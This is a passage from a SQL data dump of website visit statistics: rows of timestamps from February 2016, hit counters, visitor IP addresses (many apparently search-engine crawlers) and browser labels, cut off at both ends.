0.229.232',''),(3215,1455453365,1,1,0,0,'93.158.152.75','other'),(3216,1455453369,1,1,0,0,'141.8.142.35','other'),(3217,1455454704,1,0,1,0,'66.249.64.172',''),(3218,1455454901,1,0,1,0,'66.249.64.182',''),(3219,1455455297,1,1,0,0,'130.193.51.88','other'),(3220,1455455457,1,0,1,0,'68.180.229.232',''),(3221,1455455877,5,5,0,0,'80.91.162.99','other'),(3222,1455455889,1,1,0,0,'213.174.7.34','firefox'),(3223,1455455982,1,1,0,0,'178.93.148.143','chrome'),(3224,1455456128,68,68,0,0,'157.55.39.54','other'),(3225,1455456157,67,67,0,0,'207.46.13.121','other'),(3226,1455456175,37,37,0,0,'5.196.129.246','other'),(3227,1455456180,37,37,0,0,'164.132.13.247','other'),(3228,1455456218,60,60,0,0,'157.55.39.71','other'),(3229,1455456359,2,0,2,0,'68.180.229.232',''),(3230,1455456904,1,0,1,0,'66.249.64.182',''),(3231,1455456931,1,1,0,0,'46.185.42.27','msie'),(3232,1455457523,1,0,1,0,'66.249.64.172',''),(3233,1455457576,1,1,0,0,'5.255.253.103','other'),(3234,1455458431,2,2,0,0,'91.196.178.8','chrome'),(3235,1455459147,2,0,2,0,'66.249.64.182',''),(3236,1455459455,1,1,0,0,'180.76.15.149','other'),(3237,1455459482,1,1,0,0,'5.255.253.103','other'),(3238,1455460084,1,1,0,0,'66.249.81.208','other'),(3239,1455460536,1,0,1,0,'68.180.229.232',''),(3240,1455460729,3,3,0,0,'46.4.32.75','other'),(3241,1455461012,1,1,0,0,'8.29.198.26','other'),(3242,1455461179,1,0,1,0,'66.249.64.172',''),(3243,1455461238,1,1,0,0,'130.193.50.7','other'),(3244,1455461242,1,1,0,0,'130.193.51.59','other'),(3245,1455461298,2,2,0,0,'5.255.253.82','other'),(3246,1455461302,1,1,0,0,'93.158.152.14','other'),(3247,1455461307,1,1,0,0,'141.8.183.1','other'),(3248,1455461311,3,3,0,0,'141.8.132.45','other'),(3249,1455461315,2,2,0,0,'141.8.132.101','other'),(3250,1455461320,1,1,0,0,'93.158.152.64','other'),(3251,1455461324,2,2,0,0,'130.193.51.17','other'),(3252,1455461328,2,2,0,0,'93.158.152.46','other'),(3253,1455461332,1,1,0,0,'5.255.253.95','other'),(3254,1455461337,2,2,0,0,'141.8.142.12','other'),(3255,1455461341,1,1,0,0,'93.158.152.5','other'),(3256,1455461345,1,1,0,0,'5.255.253.80','other'),(3257,1455461358,1,1,0,0,'141.8.184.4','other'),(3258,1455461371,2,2,0,0,'5.255.253.124','other'),(3259,1455461375,1,1,0,0,'141.8.132.34','other'),(3260,1455461388,1,1,0,0,'141.8.142.35','other'),(3261,1455461392,1,1,0,0,'130.193.51.88','other'),(3262,1455461397,1,1,0,0,'141.8.132.71','other'),(3263,1455461408,1,1,0,0,'40.77.167.36','other'),(3264,1455461521,1,1,0,0,'5.255.253.30','other'),(3265,1455462324,1,1,0,0,'62.149.0.171','other'),(3266,1455462391,2,2,0,0,'62.173.163.188','other'),(3267,1455462410,1,1,0,0,'62.173.163.188','firefox'),(3268,1455462646,1,0,1,0,'66.249.64.177',''),(3269,1455462793,1,1,0,0,'40.77.167.36','other'),(3270,1455462820,1,1,0,0,'66.249.89.93','other'),(3271,1455463449,1,0,1,0,'66.249.64.182',''),(3272,1455463487,1,1,0,0,'207.46.13.121','other'),(3273,1455463740,1,1,0,0,'93.158.152.64','other'),(3274,1455463821,1,0,1,0,'66.249.64.177',''),(3275,1455464317,1,1,0,0,'89.31.57.5','chrome'),(3276,1455464527,2,2,0,0,'157.55.39.71','other'),(3277,1455464585,1,1,0,0,'213.174.7.19','chrome'),(3278,1455464614,1,0,1,0,'66.249.64.182',''),(3279,1455465272,1,1,0,0,'93.74.10.215','chrome'),(3280,1455465706,136,136,0,0,'174.34.135.242','other'),(3281,1455466402,1,0,1,0,'68.180.229.232',''),(3282,1455467078,1,0,1,0,'66.249.64.177',''),(3283,1455467200,1,1,0,0,'66.249.81.208','other'),(3284,1455467804,1,0,1,0,'66.249.64.172',''),(3285,1455467873,1,0,1,0,'66.249.64.182',''),(3286,1455468487,1,1,0,0,'66.102.9.94','firefox'),(3287,1455468640,1,1,0,0,'5.255.253.95','other'),(3288,1455468770,82,82,0,0,'40.77.167.36','other'),(3289,1455469175,1,1,0,0,'82.145.219.97','other'),(3290,1455469543,1,0,1,0,'66.249.64.182',''),(3291,1455469961,1,0,1,0,'66.249.64.172',''),(3292,1455470755,1,1,0,0,'66.249.81.208','other'),(3293,1455471299,2,2,0,0,'109.201.154.170','chrome'),(3294,1455471438,1,1,0,0,'62.210.215.100','chrome'),(3295,1455471536,1,1,0,0,'157.55.39.54','other'),(3296,1455471616,2,2,0,0,'141.8.184.18','other'),(3297,1455471620,1,1,0,0,'178.154.189.17','other'),(3298,1455471828,1,1,0,0,'8.29.198.25','other'),(3299,1455472315,1,0,1,0,'66.249.64.182',''),(3300,1455472648,1,1,0,0,'207.46.13.184','other'),(3301,1455473581,1,1,0,0,'217.69.143.64','other'),(3302,1455473861,1,1,0,0,'66.249.91.8','other'),(3303,1455474240,1,1,0,0,'157.55.39.71','other'),(3304,1455474471,1,1,0,0,'91.196.178.10','chrome'),(3305,1455475373,1,0,1,0,'66.249.69.3',''),(3306,1455475958,1,1,0,0,'180.76.15.18','other'),(3307,1455476172,6,6,0,0,'178.151.143.163','other'),(3308,1455476691,1,1,0,0,'157.55.39.54','other'),(3309,1455476869,2,0,2,0,'66.249.69.11',''),(3310,1455477308,1,1,0,0,'207.46.13.184','other'),(3311,1455477839,1,1,0,0,'66.249.81.208','other'),(3312,1455478421,1,1,0,0,'93.158.152.5','other'),(3313,1455478425,1,1,0,0,'141.8.142.40','other'),(3314,1455478429,1,1,0,0,'141.8.184.19','other'),(3315,1455478433,1,1,0,0,'141.8.132.10','other'),(3316,1455479318,1,0,1,0,'66.249.69.3',''),(3317,1455479321,1,0,1,0,'66.249.69.11',''),(3318,1455479851,1,1,0,0,'217.69.143.70','other'),(3319,1455480124,2,0,2,0,'68.180.229.232',''),(3320,1455480198,2,2,0,0,'80.78.250.147','firefox'),(3321,1455480202,2,2,0,0,'80.78.250.147','other'),(3322,1455480666,1,1,0,0,'207.46.13.184','other'),(3323,1455481368,1,1,0,0,'217.69.143.63','other'),(3324,1455481465,1,1,0,0,'66.249.81.205','other'),(3325,1455481955,1,0,1,0,'66.249.75.93',''),(3326,1455482676,1,1,0,0,'8.29.198.26','other'),(3327,1455483180,1,0,1,0,'66.249.69.124',''),(3328,1455483767,1,0,1,0,'66.249.75.93',''),(3329,1455484279,2,2,0,0,'144.76.29.66','other'),(3330,1455484394,1,0,1,0,'68.180.229.232',''),(3331,1455484602,8,8,0,0,'207.46.13.121','other'),(3332,1455484802,6,6,0,0,'157.55.39.54','other'),(3333,1455484807,4,4,0,0,'157.55.39.71','other'),(3334,1455484820,7,7,0,0,'207.46.13.184','other'),(3335,1455485058,1,1,0,0,'66.249.81.205','other'),(3336,1455485191,1,1,0,0,'66.249.91.4','other'),(3337,1455485327,1,0,1,0,'66.249.69.3',''),(3338,1455486258,1,1,0,0,'217.69.143.59','other'),(3339,1455486412,1,1,0,0,'207.46.13.121','other'),(3340,1455486895,2,0,2,0,'66.249.69.3',''),(3341,1455487065,1,0,1,0,'66.249.69.124',''),(3342,1455487285,1,1,0,0,'157.55.39.71','other'),(3343,1455487697,1,0,1,0,'68.180.229.232',''),(3344,1455488758,1,1,0,0,'66.249.81.205','other'),(3345,1455489678,1,1,0,0,'91.209.51.22','other'),(3346,1455490045,1,1,0,0,'178.154.189.204','other'),(3347,1455490504,1,0,1,0,'66.249.69.11',''),(3348,1455490600,1,1,0,0,'217.69.143.55','other'),(3349,1455491041,1,1,0,0,'141.8.183.22','other'),(3350,1455491434,3,0,3,0,'68.180.229.232',''),(3351,1455492075,2,2,0,0,'207.46.13.184','other'),(3352,1455492410,1,1,0,0,'66.249.81.205','other'),(3353,1455492868,2,0,2,0,'68.180.229.232',''),(3354,1455493149,1,1,0,0,'217.69.143.58','other'),(3355,1455493280,1,1,0,0,'109.87.138.56','other'),(3356,1455493523,1,1,0,0,'40.77.167.88','other'),(3357,1455493524,1,1,0,0,'8.29.198.25','other'),(3358,1455494166,1,0,1,0,'68.180.229.232',''),(3359,1455494878,1,1,0,0,'217.69.143.44','other'),(3360,1455496391,1,1,0,0,'66.249.91.63','other'),(3361,1455496593,1,0,1,0,'66.249.69.3',''),(3362,1455497635,1,1,0,0,'141.8.132.34','other'),(3363,1455498237,1,1,0,0,'180.76.15.18','other'),(3364,1455499663,1,0,1,0,'66.249.69.11',''),(3365,1455499890,1,0,1,0,'66.249.69.3',''),(3366,1455500246,1,1,0,0,'180.76.15.25','other'),(3367,1455501031,1,0,1,0,'66.249.69.3',''),(3368,1455502991,1,1,0,0,'40.77.167.64','other'),(3369,1455503344,1,1,0,0,'62.210.215.100','chrome'),(3370,1455503538,3,0,3,0,'66.249.69.124',''),(3371,1455503700,1,1,0,0,'178.154.189.204','other'),(3372,1455503723,1,0,1,0,'66.249.69.11',''),(3373,1455503983,2,0,2,0,'66.249.69.3',''),(3374,1455504265,1,1,0,0,'180.76.15.11','other'),(3375,1455504340,1,1,0,0,'8.29.198.26','other'),(3376,1455504587,1,0,1,0,'68.180.229.232',''),(3377,1455504807,1,1,0,0,'141.8.183.1','other'),(3378,1455504808,1,0,1,0,'66.249.69.11',''),(3379,1455504810,2,2,0,0,'93.158.152.14','other'),(3380,1455505147,2,2,0,0,'5.255.253.124','other'),(3381,1455505151,1,1,0,0,'5.255.253.24','other'),(3382,1455505166,1,1,0,0,'141.8.132.71','other'),(3383,1455505210,1,1,0,0,'5.255.253.95','other'),(3384,1455505213,1,1,0,0,'93.158.152.53','other'),(3385,1455505266,1,1,0,0,'141.8.142.76','other'),(3386,1455505271,1,1,0,0,'130.193.51.17','other'),(3387,1455505283,1,1,0,0,'141.8.184.18','other'),(3388,1455505655,1,1,0,0,'217.69.143.70','other'),(3389,1455506119,2,0,2,0,'66.249.69.3',''),(3390,1455506123,27,0,27,0,'66.249.69.124',''),(3391,1455506155,1,0,1,0,'66.249.75.93',''),(3392,1455506166,1,0,1,0,'66.249.75.77',''),(3393,1455506176,1,0,1,0,'66.249.75.85',''),(3394,1455506190,2,2,0,0,'178.154.189.17','other'),(3395,1455506194,3,3,0,0,'178.154.189.26','other'),(3396,1455506198,3,3,0,0,'130.193.51.17','other'),(3397,1455506203,1,1,0,0,'93.158.152.5','other'),(3398,1455506674,140,140,0,0,'82.193.127.15','other'),(3399,1455506685,1,1,0,0,'40.77.167.64','other'),(3400,1455506797,2,0,2,0,'66.249.69.11',''),(3401,1455506865,2,0,2,0,'68.180.229.232',''),(3402,1455506959,2,2,0,0,'93.158.152.47','other'),(3403,1455506979,1,1,0,0,'5.255.253.23','other'),(3404,1455506985,1,1,0,0,'130.193.51.66','other'),(3405,1455506990,1,1,0,0,'93.158.152.76','other'),(3406,1455507003,1,1,0,0,'141.8.142.50','other'),(3407,1455507007,2,2,0,0,'5.255.253.80','other'),(3408,1455507011,1,1,0,0,'141.8.142.76','other'),(3409,1455507047,1,1,0,0,'5.255.253.103','other'),(3410,1455507052,2,2,0,0,'5.255.253.99','other'),(3411,1455507065,1,1,0,0,'141.8.142.35','other'),(3412,1455507080,33,0,33,0,'66.249.69.124',''),(3413,1455507102,1,1,0,0,'93.158.152.44','other'),(3414,1455507126,1,0,1,0,'66.249.75.85',''),(3415,1455507133,1,1,0,0,'178.154.189.26','other'),(3416,1455507134,1,0,1,0,'66.249.75.77',''),(3417,1455507454,1,0,1,0,'66.249.69.3',''),(3418,1455507576,72,72,0,0,'82.193.127.15','other'),(3419,1455507662,1,0,1,0,'66.249.75.93',''),(3420,1455507700,1,1,0,0,'66.249.91.63','other'),(3421,1455508648,3,0,3,0,'66.249.69.124',''),(3422,1455508674,1,1,0,0,'141.8.142.50','other'),(3423,1455508808,1,0,1,0,'66.249.69.11',''),(3424,1455509663,1,1,0,0,'93.158.152.53','other'),(3425,1455509752,102,102,0,0,'136.243.103.164','other'),(3426,1455510478,7,7,0,0,'80.91.162.99','other'),(3427,1455510597,3,3,0,0,'82.193.127.15','other'),(3428,1455510965,1,0,1,0,'66.249.69.3',''),(3429,1455511271,1,1,0,0,'93.158.152.44','other'),(3430,1455511276,1,1,0,0,'93.158.152.53','other'),(3431,1455512371,1,0,1,0,'66.249.69.11',''),(3432,1455512426,1,1,0,0,'130.193.50.7','other'),(3433,1455512714,1,0,1,0,'68.180.229.232',''),(3434,1455512974,1,0,1,0,'66.249.69.124',''),(3435,1455512992,1,1,0,0,'178.154.189.26','other'),(3436,1455513605,4,4,0,0,'82.193.127.15','other'),(3437,1455514689,1,1,0,0,'130.193.51.29','other'),(3438,1455515017,1,1,0,0,'80.91.162.99','other'),(3439,1455515092,1,0,1,0,'66.249.69.11',''),(3440,1455515167,1,1,0,0,'8.29.198.26','other'),(3441,1455515176,2,0,2,0,'66.249.69.124',''),(3442,1455515357,1,1,0,0,'109.75.192.174','msie'),(3443,1455515387,1,1,0,0,'217.69.143.45','other'),(3444,1455516003,1,1,0,0,'40.77.167.54','other'),(3445,1455516157,3,3,0,0,'82.193.127.15','other'),(3446,1455516309,2,2,0,0,'141.8.184.19','other'),(3447,1455516616,1,1,0,0,'93.158.152.58','other'),(3448,1455516632,1,1,0,0,'5.255.253.86','other'),(3449,1455516637,1,1,0,0,'141.8.132.38','other'),(3450,1455516658,1,1,0,0,'141.8.183.22','other'),(3451,1455517396,1,1,0,0,'217.69.143.42','other'),(3452,1455517551,1,1,0,0,'40.77.167.64','other'),(3453,1455518106,1,1,0,0,'213.174.7.44','chrome'),(3454,1455518454,1,1,0,0,'213.174.7.17','firefox'),(3455,1455518500,1,1,0,0,'66.249.91.63','other'),(3456,1455519036,1,1,0,0,'141.8.183.22','other'),(3457,1455519159,1,1,0,0,'66.249.93.86','firefox'),(3458,1455519533,1,1,0,0,'217.69.143.43','other'),(3459,1455519922,1,1,0,0,'141.8.183.27','other'),(3460,1455519926,1,1,0,0,'130.193.51.88','other'),(3461,1455519930,1,1,0,0,'5.255.253.121','other'),(3462,1455520073,1,1,0,0,'212.111.198.100','chrome'),(3463,1455520245,1,1,0,0,'40.77.167.103','other'),(3464,1455520309,1,1,0,0,'213.174.7.21','chrome'),(3465,1455521115,1,1,0,0,'195.214.199.245','chrome'),(3466,1455521127,2,2,0,0,'213.174.7.17','firefox'),(3467,1455521321,1,1,0,0,'66.249.81.208','other'),(3468,1455521535,1,0,1,0,'68.180.229.232',''),(3469,1455521781,1,1,0,0,'40.77.167.64','other'),(3470,1455521829,1,1,0,0,'40.77.167.103','other'),(3471,1455521906,1,1,0,0,'5.255.253.43','other'),(3472,1455522249,1,0,1,0,'66.249.69.3',''),(3473,1455522990,1,1,0,0,'180.76.15.144','other'),(3474,1455523389,1,1,0,0,'40.77.167.64','other'),(3475,1455523575,1,1,0,0,'141.8.183.22','other'),(3476,1455523618,1,1,0,0,'213.174.7.21','firefox'),(3477,1455523705,1,1,0,0,'213.174.7.17','firefox'),(3478,1455523712,1,1,0,0,'178.93.3.46','chrome'),(3479,1455523755,1,1,0,0,'157.55.39.51','other'),(3480,1455524345,2,0,2,0,'66.249.69.11',''),(3481,1455525086,1,1,0,0,'66.249.81.205','other'),(3482,1455525766,4,4,0,0,'82.193.127.15','other'),(3483,1455525787,1,0,1,0,'66.249.69.124',''),(3484,1455526033,1,1,0,0,'141.8.132.27','other'),(3485,1455526036,1,1,0,0,'93.158.152.64','other'),(3486,1455526051,1,1,0,0,'8.29.198.26','other'),(3487,1455526294,1,1,0,0,'5.255.253.103','other'),(3488,1455526299,1,1,0,0,'5.255.253.95','other'),(3489,1455526303,2,2,0,0,'130.193.50.7','other'),(3490,1455526307,2,2,0,0,'141.8.142.50','other'),(3491,1455526311,2,2,0,0,'141.8.132.34','other'),(3492,1455526315,3,3,0,0,'178.154.189.26','other'),(3493,1455526345,1,1,0,0,'141.8.142.35','other'),(3494,1455526399,1,1,0,0,'178.154.189.17','other'),(3495,1455526419,1,1,0,0,'130.193.37.18','other'),(3496,1455526431,1,1,0,0,'130.193.51.26','other'),(3497,1455526696,1,1,0,0,'213.174.7.35','firefox'),(3498,1455526891,1,1,0,0,'66.102.9.94','firefox'),(3499,1455527008,1,1,0,0,'180.76.15.136','other'),(3500,1455527471,1,1,0,0,'62.210.215.100','chrome'),(3501,1455527472,1,1,0,0,'188.165.118.138','chrome'),(3502,1455527636,1,1,0,0,'213.174.7.34','firefox'),(3503,1455528063,1,1,0,0,'213.174.7.19','chrome'),(3504,1455528292,1,1,0,0,'82.145.220.42','chrome'),(3505,1455528505,1,0,1,0,'66.249.69.11',''),(3506,1455528725,1,1,0,0,'66.249.81.211','other'),(3507,1455528853,1,1,0,0,'213.174.7.34','firefox'),(3508,1455529018,1,1,0,0,'180.76.15.29','other'),(3509,1455529113,1,0,1,0,'66.249.69.124',''),(3510,1455529170,1,1,0,0,'66.249.91.8','other'),(3511,1455529629,1,1,0,0,'37.53.76.152','firefox'),(3512,1455529893,1,1,0,0,'91.196.178.35','chrome'),(3513,1455530110,1,0,1,0,'68.180.229.232',''),(3514,1455530201,2,0,2,0,'66.249.69.124',''),(3515,1455530702,1,1,0,0,'217.69.143.63','other'),(3516,1455530865,1,0,1,0,'66.249.75.85',''),(3517,1455531188,1,1,0,0,'213.174.7.19','firefox'),(3518,1455531812,1,1,0,0,'213.174.7.56','firefox'),(3519,1455532319,1,1,0,0,'213.174.7.16','firefox'),(3520,1455532324,1,1,0,0,'66.249.81.205','other'),(3521,1455532770,1,1,0,0,'213.174.7.21','firefox'),(3522,1455532802,1,1,0,0,'176.119.24.186','opera'),(3523,1455532834,1,0,1,0,'68.180.229.232',''),(3524,1455533834,2,0,2,0,'68.180.229.232',''),(3525,1455534085,1,1,0,0,'37.55.59.177','opera'),(3526,1455534087,1,1,0,0,'213.174.7.21','chrome'),(3527,1455534299,1,1,0,0,'119.147.146.189','chrome'),(3528,1455534646,1,0,1,0,'66.249.69.3',''),(3529,1455534764,1,1,0,0,'157.55.39.138','other'),(3530,1455535083,2,0,2,0,'68.180.229.232',''),(3531,1455535228,1,1,0,0,'213.111.86.197','chrome'),(3532,1455535682,1,1,0,0,'217.69.136.206','other'),(3533,1455535778,1,1,0,0,'40.77.167.103','other'),(3534,1455535861,1,1,0,0,'217.69.143.50','other'),(3535,1455535917,1,1,0,0,'66.249.81.205','other'),(3536,1455535931,1,0,1,0,'66.249.69.124',''),(3537,1455536418,1,1,0,0,'217.69.143.68','other'),(3538,1455536861,1,1,0,0,'8.29.198.26','other'),(3539,1455537416,1,1,0,0,'213.174.7.44','msie'),(3540,1455537669,1,1,0,0,'213.174.7.7','chrome'),(3541,1455537799,1,1,0,0,'82.207.49.34','opera'),(3542,1455537909,1,1,0,0,'213.174.7.19','firefox'),(3543,1455538323,1,1,0,0,'92.113.150.42','chrome'),(3544,1455538415,1,1,0,0,'213.174.7.52','chrome'),(3545,1455538885,1,0,1,0,'66.249.69.3',''),(3546,1455539228,1,0,1,0,'68.180.229.232',''),(3547,1455539353,1,0,1,0,'66.249.69.124',''),(3548,1455539440,1,1,0,0,'91.196.178.16','firefox'),(3549,1455539547,1,1,0,0,'91.196.178.33','chrome'),(3550,1455539579,1,1,0,0,'66.249.81.208','other'),(3551,1455539721,1,1,0,0,'66.249.91.4','other'),(3552,1455539797,1,1,0,0,'157.55.39.138','other'),(3553,1455539921,1,1,0,0,'141.8.184.18','other'),(3554,1455540507,1,1,0,0,'46.211.154.223','chrome'),(3555,1455540755,1,1,0,0,'94.179.51.140','chrome'),(3556,1455541015,1,1,0,0,'46.201.240.112','firefox'),(3557,1455541121,2,2,0,0,'157.55.39.138','other'),(3558,1455541678,1,0,1,0,'68.180.229.232',''),(3559,1455542174,1,1,0,0,'157.55.39.138','other'),(3560,1455542227,1,1,0,0,'217.69.143.55','other'),(3561,1455542299,1,1,0,0,'217.69.143.70','other'),(3562,1455542398,2,2,0,0,'94.179.78.173','chrome'),(3563,1455542435,1,1,0,0,'93.183.208.9','chrome'),(3564,1455542617,1,1,0,0,'93.158.152.8','other'),(3565,1455542621,1,1,0,0,'93.158.152.46','other'),(3566,1455542622,1,1,0,0,'213.174.7.21','firefox'),(3567,1455542793,1,1,0,0,'62.210.215.100','chrome'),(3568,1455542995,1,1,0,0,'213.174.7.23','chrome'),(3569,1455543148,1,1,0,0,'66.249.81.205','other'),(3570,1455543191,2,2,0,0,'157.55.39.138','other'),(3571,1455543294,1,0,1,0,'68.180.229.232',''),(3572,1455543401,1,0,1,0,'66.249.69.124',''),(3573,1455543529,252,252,0,0,'83.149.126.98','other'),(3574,1455544152,1,1,0,0,'78.46.203.17','chrome'),(3575,1455544196,1,1,0,0,'157.55.39.138','other'),(3576,1455544583,1,1,0,0,'94.179.66.229','firefox'),(3577,1455544805,1,0,1,0,'66.249.75.85',''),(3578,1455544841,1,1,0,0,'78.111.185.243','chrome'),(3579,1455544880,1,1,0,0,'213.174.7.34','chrome'),(3580,1455545149,1,1,0,0,'46.201.255.163','chrome'),(3581,1455545333,1,0,1,0,'68.180.229.232',''),(3582,1455545361,1,1,0,0,'93.158.152.47','other'),(3583,1455545365,1,1,0,0,'93.158.152.64','other'),(3584,1455545608,1,1,0,0,'157.55.39.138','other'),(3585,1455546025,1,0,1,0,'66.249.69.124',''),(3586,1455546740,1,1,0,0,'157.55.39.138','other'),(3587,1455546851,3,3,0,0,'141.8.184.18','other'),(3588,1455547008,1,1,0,0,'62.210.215.100','chrome'),(3589,1455547058,1,1,0,0,'177.75.16.71','other'),(3590,1455547209,1,1,0,0,'209.239.122.235','other'),(3591,1455547232,1,1,0,0,'213.174.7.19','firefox'),(3592,1455547571,1,1,0,0,'93.158.152.46','other'),(3593,1455547576,1,1,0,0,'178.154.189.26','other'),(3594,1455547581,1,1,0,0,'130.193.51.29','other'),(3595,1455547584,2,2,0,0,'130.193.51.26','other'),(3596,1455547592,1,1,0,0,'93.158.152.8','other'),(3597,1455547597,2,2,0,0,'130.193.37.18','other'),(3598,1455547601,2,2,0,0,'141.8.183.1','other'),(3599,1455547612,1,1,0,0,'130.193.51.17','other'),(3600,1455547615,1,1,0,0,'141.8.132.52','other'),(3601,1455547622,1,1,0,0,'93.158.152.53','other'),(3602,1455547627,1,1,0,0,'93.158.152.14','other'),(3603,1455547635,1,1,0,0,'178.154.189.17','other'),(3604,1455547642,1,1,0,0,'141.8.142.76','other'),(3605,1455547709,1,1,0,0,'8.29.198.25','other'),(3606,1455548047,1,0,1,0,'66.249.69.3',''),(3607,1455548107,1,0,1,0,'66.249.69.11',''),(3608,1455548160,1,1,0,0,'157.55.39.138','other'),(3609,1455548165,1,1,0,0,'207.46.13.96','other'),(3610,1455548383,2,0,2,0,'66.249.75.77',''),(3611,1455548414,3,0,3,0,'68.180.229.232',''),(3612,1455548942,2,2,0,0,'5.255.253.95','other'),(3613,1455548948,1,1,0,0,'141.8.132.10','other'),(3614,1455549015,1,1,0,0,'101.226.167.222','chrome'),(3615,1455549087,1,1,0,0,'101.226.168.252','chrome'),(3616,1455549089,1,1,0,0,'207.46.13.96','other'),(3617,1455549094,1,1,0,0,'157.55.39.138','other'),(3618,1455549182,1,1,0,0,'182.118.21.240','msie'),(3619,1455549636,1,0,1,0,'66.249.69.3',''),(3620,1455549713,1,0,1,0,'66.249.69.124',''),(3621,1455550062,1,1,0,0,'217.69.143.69','other'),(3622,1455550063,1,1,0,0,'217.69.143.68','other'),(3623,1455550237,1,1,0,0,'207.46.13.96','other'),(3624,1455550241,2,2,0,0,'157.55.39.138','other'),(3625,1455550393,1,0,1,0,'66.249.69.11',''),(3626,1455551051,1,1,0,0,'66.249.91.63','other'),(3627,1455551361,1,1,0,0,'207.46.13.96','other'),(3628,1455551365,1,1,0,0,'157.55.39.138','other'),(3629,1455551439,1,1,0,0,'130.193.37.18','other'),(3630,1455551443,1,1,0,0,'5.255.253.24','other'),(3631,1455551447,1,1,0,0,'130.193.51.29','other'),(3632,1455552084,1,1,0,0,'180.76.15.142','other'),(3633,1455552717,1,1,0,0,'207.46.13.96','other'),(3634,1455552719,1,1,0,0,'157.55.39.138','other'),(3635,1455552755,2,0,2,0,'66.249.69.124',''),(3636,1455552846,1,0,1,0,'68.180.229.232',''),(3637,1455553512,1,0,1,0,'66.249.69.3',''),(3638,1455553701,1,1,0,0,'207.46.13.96','other'),(3639,1455553704,1,1,0,0,'157.55.39.138','other'),(3640,1455554009,1,1,0,0,'217.69.143.54','other'),(3641,1455554210,1,1,0,0,'217.69.143.61','other'),(3642,1455554431,1,1,0,0,'94.179.80.224','chrome'),(3643,1455554510,1,1,0,0,'82.193.127.15','other'),(3644,1455554792,1,1,0,0,'207.46.13.96','other'),(3645,1455554798,1,1,0,0,'157.55.39.138','other'),(3646,1455555707,1,1,0,0,'157.55.39.138','other'),(3647,1455555710,2,2,0,0,'207.46.13.96','other'),(3648,1455555877,1,0,1,0,'68.180.229.232',''),(3649,1455556058,1,1,0,0,'91.209.51.22','other'),(3650,1455556095,1,1,0,0,'62.210.215.100','chrome'),(3651,1455556739,1,1,0,0,'130.193.51.26','other'),(3652,1455556743,1,1,0,0,'141.8.184.18','other'),(3653,1455556747,1,1,0,0,'178.154.189.26','other'),(3654,1455556819,3,0,3,0,'68.180.229.232',''),(3655,1455556917,1,1,0,0,'207.46.13.96','other'),(3656,1455556919,1,1,0,0,'157.55.39.138','other'),(3657,1455557082,1,1,0,0,'40.77.167.64','other'),(3658,1455557140,1,1,0,0,'213.174.7.33','chrome'),(3659,1455557916,2,2,0,0,'82.193.127.15','other'),(3660,1455558142,1,1,0,0,'62.141.50.118','other'),(3661,1455558239,1,1,0,0,'207.46.13.96','other'),(3662,1455558248,1,1,0,0,'157.55.39.138','other'),(3663,1455558524,1,1,0,0,'8.29.198.25','other'),(3664,1455558655,1,1,0,0,'40.77.167.2','other'),(3665,1455558833,1,1,0,0,'217.69.143.52','other'),(3666,1455559204,1,1,0,0,'207.46.13.96','other'),(3667,1455559208,1,1,0,0,'157.55.39.138','other'),(3668,1455560109,1,1,0,0,'207.46.13.96','other'),(3669,1455560458,1,1,0,0,'40.77.167.2','other'),(3670,1455560635,1,0,1,0,'66.249.69.11',''),(3671,1455560882,1,0,1,0,'68.180.229.232',''),(3672,1455561023,1,1,0,0,'193.194.127.217','firefox'),(3673,1455561035,1,1,0,0,'157.55.39.89','other'),(3674,1455561242,1,1,0,0,'157.55.39.138','other'),(3675,1455561290,3,3,0,0,'141.8.184.18','other'),(3676,1455561506,1,1,0,0,'207.46.13.96','other'),(3677,1455561859,1,0,1,0,'66.249.69.124',''),(3678,1455561886,1,1,0,0,'180.76.15.139','other'),(3679,1455562083,1,1,0,0,'66.249.91.63','other'),(3680,1455562252,1,1,0,0,'37.110.214.30','other'),(3681,1455562905,1,1,0,0,'178.93.148.225','chrome'),(3682,1455563084,1,1,0,0,'217.69.136.206','other'),(3683,1455563283,2,2,0,0,'207.46.13.96','other'),(3684,1455563471,1,1,0,0,'5.255.253.95','other'),(3685,1455563479,1,1,0,0,'141.8.184.18','other'),(3686,1455563483,1,1,0,0,'5.255.253.99','other'),(3687,1455563583,1,1,0,0,'62.210.215.100','chrome'),(3688,1455563746,1,1,0,0,'40.77.167.2','other'),(3689,1455564069,1,1,0,0,'66.249.81.205','other'),(3690,1455564135,1,1,0,0,'66.249.93.86','firefox'),(3691,1455564161,1,0,1,0,'66.249.75.93',''),(3692,1455564335,1,0,1,0,'66.249.75.77',''),(3693,1455564354,1,1,0,0,'178.92.250.65','firefox'),(3694,1455564416,2,2,0,0,'207.46.13.96','other'),(3695,1455564562,1,1,0,0,'91.196.178.15','firefox'),(3696,1455564977,1,1,0,0,'217.69.143.67','other'),(3697,1455565115,1,1,0,0,'178.94.37.124','other'),(3698,1455565379,1,1,0,0,'40.77.167.2','other'),(3699,1455565465,2,2,0,0,'207.46.13.96','other'),(3700,1455566240,1,0,1,0,'68.180.229.232',''),(3701,1455566346,1,1,0,0,'88.135.213.12','opera'),(3702,1455566428,3,3,0,0,'207.46.13.96','other'),(3703,1455566459,1,1,0,0,'192.99.107.219','other'),(3704,1455566473,1,1,0,0,'40.77.167.2','other'),(3705,1455566483,1,1,0,0,'157.55.39.138','other'),(3706,1455566553,1,1,0,0,'178.92.250.65','firefox'),(3707,1455566874,1,0,1,0,'66.249.69.11',''),(3708,1455567141,2,2,0,0,'5.255.253.24','other'),(3709,1455567150,1,1,0,0,'141.8.142.35','other'),(3710,1455567154,1,1,0,0,'141.8.132.10','other'),(3711,1455567479,2,2,0,0,'207.46.13.96','other'),(3712,1455567951,1,1,0,0,'40.77.167.2','other'),(3713,1455568484,1,0,1,0,'66.249.69.3',''),(3714,1455568625,2,2,0,0,'207.46.13.96','other'),(3715,1455568971,1,0,1,0,'68.180.229.232',''),(3716,1455569151,2,0,2,0,'66.249.69.11',''),(3717,1455569290,1,1,0,0,'207.46.13.144','other'),(3718,1455569317,1,1,0,0,'141.8.142.12','other'),(3719,1455569321,1,1,0,0,'93.158.152.14','other'),(3720,1455569329,1,1,0,0,'178.154.189.17','other'),(3721,1455569347,1,1,0,0,'8.29.198.25','other'),(3722,1455569601,1,1,0,0,'207.46.13.96','other'),(3723,1455569769,2,0,2,0,'66.249.69.3',''),(3724,1455569781,2,0,2,0,'66.249.69.124',''),(3725,1455570397,1,1,0,0,'37.53.123.41','chrome'),(3726,1455570417,2,0,2,0,'68.180.229.232',''),(3727,1455570530,27,27,0,0,'82.193.127.15','other'),(3728,1455570624,1,1,0,0,'217.69.143.71','other'),(3729,1455571023,1,1,0,0,'207.46.13.96','other'),(3730,1455571602,3,0,3,